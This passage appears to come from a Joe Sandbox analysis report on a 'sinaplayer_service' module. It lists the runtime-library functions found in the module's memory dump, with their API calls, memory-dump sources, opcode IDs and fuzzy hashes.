                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,?,?,6D0E754C,6D15CEE8,?), ref: 6D0EC888
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: std::exception::exception$??0exception@std@@ExceptionThrowValue
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3255388332-0
                                                                                                                                                                                                    • Opcode ID: 68a5f4566abb908f9b6ee5ce86a286469f866f80f6638a12a44d8d56bbb1a5e0
                                                                                                                                                                                                    • Instruction ID: 545070469c4bad785d0b08f5e0a6e3542b6c2c4d7931798aacc4eee69683dca3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68a5f4566abb908f9b6ee5ce86a286469f866f80f6638a12a44d8d56bbb1a5e0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D112972904208AFD710DF99E944BAEBFB8EF806A0710806AEA5597211DB72D901CBD5
                                                                                                                                                                                                    Function 6D0F2E72 Relevance: 7.6, APIs: 5, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,?,?,?,6D0F2CC2,00000004,6D0F249A), ref: 6D0F2E7E
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,?,?,?,6D0F2CC2,00000004,6D0F249A), ref: 6D0F2E96
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,6D0F2CC2,00000004,6D0F249A), ref: 6D0F2EE0
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,6D0F2CC2,00000004,6D0F249A), ref: 6D0F2EE6
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,6D0F2CC2,00000004,6D0F249A), ref: 6D0F2EF6
                                                                                                                                                                                                      • Part of subcall function 6D0EAF6F: free.MSVCR120(?,?,6D0EAF12), ref: 6D0EAF79
                                                                                                                                                                                                      • Part of subcall function 6D0EAF6F: free.MSVCR120(?,?,?,6D0EAF12), ref: 6D0EAF81
                                                                                                                                                                                                      • Part of subcall function 6D0EAF6F: free.MSVCR120(?,?,?,?,6D0EAF12), ref: 6D0EAF89
                                                                                                                                                                                                      • Part of subcall function 6D0EAF6F: free.MSVCR120(?,?,?,?,?,6D0EAF12), ref: 6D0EAF91
                                                                                                                                                                                                      • Part of subcall function 6D0EAF6F: free.MSVCR120(?,?,?,?,?,?,6D0EAF12), ref: 6D0EAF97
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$FlushInterlockedList
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1955102368-0
                                                                                                                                                                                                    • Opcode ID: af96c909c4a9bbf4f6ed17851176f120f48a0721100f2436b4e4f59b0863b591
                                                                                                                                                                                                    • Instruction ID: 9ad7d66824f7fc49cfcb73123ac53410802c73bd26003840393e7ca835910c92
                                                                                                                                                                                                    • Opcode Fuzzy Hash: af96c909c4a9bbf4f6ed17851176f120f48a0721100f2436b4e4f59b0863b591
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 631191329046629BEB36DB61C580A69F3B0BF493A03720558DE80A7601DB21BC06CBD0
                                                                                                                                                                                                    Function 6D0AA0D4 Relevance: 7.6, APIs: 5, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D08F764: _getptd.MSVCR120(00000001,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D08F77A
                                                                                                                                                                                                    • _tolower_l.MSVCR120(00000000,00000000,00000000,00000001,00000000,00000004,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000001,?,00000000), ref: 6D0AA119
                                                                                                                                                                                                    • _tolower_l.MSVCR120(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000004,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000001), ref: 6D0AA128
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000001,00000000,00000004,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000001,?,00000000,00000000,6D163B90), ref: 6D0DAA7B
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,00000001,00000000,00000004,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000001,?,00000000,00000000,6D163B90), ref: 6D0DAA86
                                                                                                                                                                                                    • ___ascii_stricmp.LIBCMT ref: 6D0DAA97
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _tolower_l$___ascii_stricmp_errno_getptd_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3107707399-0
                                                                                                                                                                                                    • Opcode ID: 84813851034a8717271fea99eba7a290e7d961285fff9cd1113fb0d8ba26f70c
                                                                                                                                                                                                    • Instruction ID: e9da14d321c8547c783e986f3da201272e08bb6d37796c5652d06768ef5e51c9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84813851034a8717271fea99eba7a290e7d961285fff9cd1113fb0d8ba26f70c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6110A729082266FEB019EACC884FBF77A8EB15294F250759E5305B1D1EB359C00C7A0
                                                                                                                                                                                                    Function 6D0AFEF3 Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _fileno.MSVCR120(?,6D0AFF90,00000008), ref: 6D0AFF15
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,?,6D0AFF90,00000008), ref: 6D0AFF1D
                                                                                                                                                                                                      • Part of subcall function 6D094B96: _lock.MSVCR120(?), ref: 6D094BC1
                                                                                                                                                                                                    • _lseek.MSVCR120(00000000,00000000,00000000,?,?,6D0AFF90,00000008), ref: 6D0AFF6C
                                                                                                                                                                                                    • _errno.MSVCR120(6D0AFF90,00000008), ref: 6D0D58D0
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D0AFF90,00000008), ref: 6D0D58DB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_fileno_invalid_parameter_noinfo_lock_lock_file_lseek
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3904067199-0
                                                                                                                                                                                                    • Opcode ID: a2377291d205dd3c775ea70bf70af0e34163ec7b81b1f60d36807a435c19ddc5
                                                                                                                                                                                                    • Instruction ID: 25a00bb5dc45c91e5fd475052b974f6ec23d7b3b5b0713acfb5bdd464ee3056a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2377291d205dd3c775ea70bf70af0e34163ec7b81b1f60d36807a435c19ddc5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE112732514700AAFA208FB98C0176D3BA4AF03374F2A8309F5358F1D2CB39D6019756
                                                                                                                                                                                                    Function 6D0EC9DA Relevance: 7.6, APIs: 5, Instructions: 57threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • TlsSetValue.KERNEL32(?,?), ref: 6D0ECA00
                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6D0ECA35
                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCMT ref: 6D0ECA48
                                                                                                                                                                                                      • Part of subcall function 6D0EEE8E: GetLastError.KERNEL32(?,?,?,6D0D30F2), ref: 6D0EEE94
                                                                                                                                                                                                      • Part of subcall function 6D0EEE8E: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,6D0D30F2), ref: 6D0EEEAA
                                                                                                                                                                                                      • Part of subcall function 6D0EEE8E: _CxxThrowException.MSVCR120(?,6D15CF40,00000000,?,?,?,6D0D30F2), ref: 6D0EEEB8
                                                                                                                                                                                                      • Part of subcall function 6D0EC9DA: List.LIBCMT ref: 6D0ECA67
                                                                                                                                                                                                      • Part of subcall function 6D0EC9DA: free.MSVCR120(?,?), ref: 6D0ECA73
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCoreCurrentDecrementErrorExceptionLastListProxy::SchedulerSubscriptionThreadThrowValuefree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3155433331-0
                                                                                                                                                                                                    • Opcode ID: 9b89699d44a2a8f4967c9c2acf5442ecf3821cd6c3947f9f6d86fbc73242869d
                                                                                                                                                                                                    • Instruction ID: 20f832ebb6fe9219e063e132f03c2e3b236402bbb2321553eee9a3ccb113b756
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b89699d44a2a8f4967c9c2acf5442ecf3821cd6c3947f9f6d86fbc73242869d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0611E3311087008FE630DFA2E854BBBB7F8FF09358B08460EE5C747590CB22A8048BA5
                                                                                                                                                                                                    Function 6D0B1B83 Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wcslen.MSVCR120(?,6D0B1C00,00000014), ref: 6D0B1BB9
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,?,6D0B1C00,00000014), ref: 6D0B1BC2
                                                                                                                                                                                                      • Part of subcall function 6D094B96: _lock.MSVCR120(?), ref: 6D094BC1
                                                                                                                                                                                                    • _fputwc_nolock.MSVCR120(?,?,6D0B1C00,00000014), ref: 6D0B1BE7
                                                                                                                                                                                                    • _errno.MSVCR120(6D0B1C00,00000014), ref: 6D0D4FCE
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D0B1C00,00000014), ref: 6D0D4FD9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_fputwc_nolock_invalid_parameter_noinfo_lock_lock_filewcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1101344634-0
                                                                                                                                                                                                    • Opcode ID: 4b76de0785d98981b79d58dd6c4cbd14a4a4878be8069e6a154c75eddc9c8971
                                                                                                                                                                                                    • Instruction ID: c2bbdc3b018b11c9a170c5350bc5d893a3af65fe97065e28564bdc772c22ba67
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b76de0785d98981b79d58dd6c4cbd14a4a4878be8069e6a154c75eddc9c8971
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1211E571A0C31AABFB108F69984077E76B4FF09354B11412EF920EB2C0DF35C9419B69
                                                                                                                                                                                                    Function 6D0ECBA7 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D0A3AF4: TlsGetValue.KERNEL32(6D0A3DF7,00000000,00000000,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D0A3AFA
                                                                                                                                                                                                    • SetEvent.KERNEL32(?,00000004,?,00000000), ref: 6D0ECBE0
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120 ref: 6D0ECBF8
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(00000004,?,00000000), ref: 6D0ECC0E
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E7774,6D15CF5C), ref: 6D0ECC23
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(6D15CF5C,?,?,6D0E7774,6D15CF5C), ref: 6D0ECC32
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??0exception@std@@$EventExceptionThrowValuestd::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4125633965-0
                                                                                                                                                                                                    • Opcode ID: 7cec0bad00454f2f8e6c477e53090ff1ac2a26f9cae7ed14ccfebc1b74e4cadd
                                                                                                                                                                                                    • Instruction ID: f2e7f98adc352c17fab1754f5964d597f29e232c1e94b6b937624b1648b8ae42
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cec0bad00454f2f8e6c477e53090ff1ac2a26f9cae7ed14ccfebc1b74e4cadd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A116B71908208AFE714DFA8CC05AEDBBB8EF01290B4082AAF62497151DF72E901CB84
                                                                                                                                                                                                    Function 6D0ACA08 Relevance: 7.5, APIs: 5, Instructions: 46memorythreadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: EncodePointer.KERNEL32(00000000,?,6D0ACA0D,6D0ACA91,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0AD411
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: __initp_misc_winsig.LIBCMT ref: 6D0AD42C
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetModuleHandleW.KERNEL32(kernel32.dll,00000000), ref: 6D0AD448
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6D0AD45C
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6D0AD46F
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6D0AD482
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6D0AD495
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 6D0AD4A8
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 6D0AD4BB
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 6D0AD4CE
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 6D0AD4E1
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 6D0AD4F4
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 6D0AD507
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 6D0AD51A
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 6D0AD52D
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 6D0AD540
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 6D0AD553
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 6D0AD566
                                                                                                                                                                                                    • __crtFlsAlloc.MSVCR120(?,6D0ACA91,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0ACA1F
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,000003BC,?,6D0ACA91,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0ACA3B
                                                                                                                                                                                                    • __crtFlsSetValue.MSVCR120(00000000,?,6D0ACA91,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0ACA4F
                                                                                                                                                                                                    • _initptd.MSVCR120(00000000,00000000,6D0ACA91,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0ACA5D
                                                                                                                                                                                                      • Part of subcall function 6D091BFD: _lock.MSVCR120(0000000D), ref: 6D091C41
                                                                                                                                                                                                      • Part of subcall function 6D091BFD: _lock.MSVCR120(0000000C), ref: 6D091C62
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6D0ACA64
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$__crt_lock$AllocCurrentEncodeHandleModulePointerThreadValue__initp_misc_winsig_calloc_crt_initptd
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4031882113-0
                                                                                                                                                                                                    • Opcode ID: 75afa3a476287907d0b4d6f1bd2cc58141bc6d4f410ecb09102790abfe2794af
                                                                                                                                                                                                    • Instruction ID: d73def9b7e1dd5d9e427506637a007a3011931852b7ef35bedf726363dc6740b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75afa3a476287907d0b4d6f1bd2cc58141bc6d4f410ecb09102790abfe2794af
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27F0F63690EB122EF714BAB47C0576A36D8DB03678F26061AE674DE0C5FF21C4028996
                                                                                                                                                                                                    Function 6D097FDE Relevance: 7.5, APIs: 5, Instructions: 45COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _get_osfhandle.MSVCR120(00000000,00000000,00000000,00000000,00000000,?,6D0DE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6D097FE9
                                                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,6D0D5D30,?,00000000,00000000,00000000,00000000,00000000,00000000,?,6D0DE899,00000000,00000000,00000000,00000002,00000000), ref: 6D098008
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000000,00000000,00000000,?,6D0DE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6D0DEE36
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D0DE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6D0DEE4A
                                                                                                                                                                                                    • __dosmaperr.LIBCMT(00000000,?,6D0DE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6D0DEE51
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorFileLastPointer__dosmaperr_errno_get_osfhandle
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1165083932-0
                                                                                                                                                                                                    • Opcode ID: 8b7d619db551882222eeb8e4aa872068f53fd920d9e221838ece4e24e55abe05
                                                                                                                                                                                                    • Instruction ID: 2d6144ff980898e4d35d4b59240e97a488bc0633dd1d87b7423100366b1b56d3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b7d619db551882222eeb8e4aa872068f53fd920d9e221838ece4e24e55abe05
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A012632614256AFEF018F98EC08AAE7729EB46230B114249F920CB2D0EBB0D80087A0
                                                                                                                                                                                                    Function 6D09E0B5 Relevance: 7.5, APIs: 5, Instructions: 43COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
